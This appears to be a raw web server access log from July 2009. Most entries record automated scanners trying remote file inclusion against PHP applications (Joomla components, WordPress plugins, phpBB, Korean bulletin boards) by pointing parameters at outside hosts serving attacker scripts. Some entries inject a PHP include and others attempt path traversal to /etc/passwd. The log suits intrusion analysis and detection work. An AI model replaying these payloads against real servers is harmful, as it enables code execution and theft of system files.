210.205.57.2 - - [18/Jul/2009:02:40:02 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:40:02 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:40:03 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:40:03 -0400] "GET //include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:40:20 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:40:21 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:40:38 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:40:38 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:40:38 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:40:54 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:40:54 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:02:41:21 -0400] "GET /logs/access_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:02:41:21 -0400] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:02:41:21 -0400] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:41:25 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:41:25 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:41:25 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:02:41:26 -0400] "GET /logs/error_log.Q109062000%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
61.100.189.234 - - [18/Jul/2009:02:41:32 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.peb.com.ua/ua/readme.txt?? HTTP/1.1" 200 453 "-" "libwww-perl/5.79"
114.32.40.221 - - [18/Jul/2009:02:41:56 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:41:56 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:41:56 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:42:05 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.32.40.221 - - [18/Jul/2009:02:42:10 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:43:16 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:43:32 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:02:43:32 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:02:43:32 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
114.32.40.221 - - [18/Jul/2009:02:43:37 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:43:45 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:02:43:45 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:02:43:47 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
213.149.105.8 - - [18/Jul/2009:02:44:01 -0400] "GET /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:44:01 -0400] "GET /logs/access_log.Q109070200/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:44:01 -0400] "GET /logs/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
114.32.40.221 - - [18/Jul/2009:02:44:07 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:44:14 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:02:44:22 -0400] "GET /logs/access_log.Q109062900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.aboutav.com//Scripts/id.txt%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
218.237.66.229 - - [18/Jul/2009:02:44:52 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:44:52 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:44:52 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:45:22 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:45:22 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:45:22 -0400] "GET /logs/access_log.Q109061200%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
81.13.86.34 - - [18/Jul/2009:02:45:32 -0400] "GET /logs/error_log.Q109052300//errors.php?error=http://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
81.13.86.34 - - [18/Jul/2009:02:45:32 -0400] "GET /logs//errors.php?error=http://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
81.13.86.34 - - [18/Jul/2009:02:45:34 -0400] "GET //errors.php?error=http://www.amembersignup.com/signup/data/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
209.59.12.99 - - [18/Jul/2009:02:47:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
58.227.193.198 - - [18/Jul/2009:02:47:14 -0400] "GET /logs/error_log.Q109070300%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:47:24 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:48:11 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:48:14 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:02:48:50 -0400] "GET /logs/access_log.Q109062700//components/com_mambowiki/Mam***ogin.php?IP=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:48:50 -0400] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:48:50 -0400] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:48:50 -0400] "GET /logs/access_log.Q109060900//components/com_mambowiki/Mam***ogin.php?IP=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
124.0.145.1 - - [18/Jul/2009:02:48:51 -0400] "GET /logs/access_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:02:48:51 -0400] "GET /logs/error_log.Q109062000/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:48:52 -0400] "GET /logs/access_log.Q109070200%20%20/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:51:16 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:51:16 -0400] "GET //include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:51:16 -0400] "GET /logs//include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
213.149.105.8 - - [18/Jul/2009:02:51:28 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:51:28 -0400] "GET //components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:51:28 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
213.149.105.8 - - [18/Jul/2009:02:51:28 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:51:38 -0400] "GET /logs/access_log.Q109052800//include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:51:39 -0400] "GET //include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:51:40 -0400] "GET /logs//include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
70.168.96.43 - - [18/Jul/2009:02:51:43 -0400] "GET //components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:02:51:44 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:02:51:44 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
70.168.96.43 - - [18/Jul/2009:02:51:44 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:02:51:54 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:02:51:54 -0400] "GET //components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:02:51:54 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
83.96.135.55 - - [18/Jul/2009:02:51:54 -0400] "GET /logs/access_log.Q109070300//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:52:12 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.149.105.8 - - [18/Jul/2009:02:52:26 -0400] "GET /logs/access_log.Q109070300/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:52:54 -0400] "GET /logs/access_log.Q109051300//?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:54 -0400] "GET //?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:55 -0400] "GET /logs//?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 9999 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:57 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:57 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:58 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:59 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:59 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:52:59 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:53:11 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?site_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:15 -0400] "GET /logs/access_log.Q109051300//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:16 -0400] "GET //?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:16 -0400] "GET /logs//?_zb_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 200 9999 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:23 -0400] "GET /logs/access_log.Q109070200//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:23 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
115.92.96.43 - - [18/Jul/2009:02:53:24 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:53:27 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:28 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:28 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:53:36 -0400] "GET /logs/access_log.Q109051400//?_zb_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:48 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:54 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:54 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:54 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:02:53:55 -0400] "GET /logs/access_log.Q109050700//components/com_mambowiki/Mam***ogin.php?IP=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.23.4 - - [18/Jul/2009:02:53:57 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:57 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:57 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:58 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:58 -0400] "GET //?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:53:58 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 200 9999 "-" "Mozilla/5.0"
115.92.96.43 - - [18/Jul/2009:02:54:03 -0400] "GET /logs/error_log.Q109052800//include/mail.inc.php?site_path=http://www.1remont.ru/readme.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:02:54:05 -0400] "GET /logs/access_log.Q109060700//?path%5Bdocroot%5D=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
82.146.58.26 - - [18/Jul/2009:02:54:05 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
82.146.58.26 - - [18/Jul/2009:02:54:05 -0400] "GET /logs/access_log.Q109062900//components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
82.146.58.26 - - [18/Jul/2009:02:54:06 -0400] "GET //components/com_flyspray/startdown.php?file=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.137.102.7 - - [18/Jul/2009:02:54:06 -0400] "GET /logs/access_log.Q109061300/login.php?dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
